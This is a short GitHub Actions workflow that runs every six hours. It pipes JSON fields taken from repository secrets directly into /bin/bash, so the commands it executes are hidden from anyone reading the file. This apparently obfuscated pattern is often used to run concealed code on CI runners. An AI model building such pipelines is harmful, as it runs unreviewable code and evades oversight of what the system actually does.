name: zhangcongrong6247

on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangcongrong6247
        env:
          e112: ${{ secrets.e112 }}
        run: |
          echo $e112 | jq -r .p8 | /bin/bash
          echo $qq1159 | jq -r .bkpd912 | /bin/bash
          echo $ii47 | jq -r .sbtgt5 | /bin/bash
          echo $cjc0127 | jq -r .x8 | /bin/bash
          echo $o3 | jq -r .ajwm69021 | /bin/bash

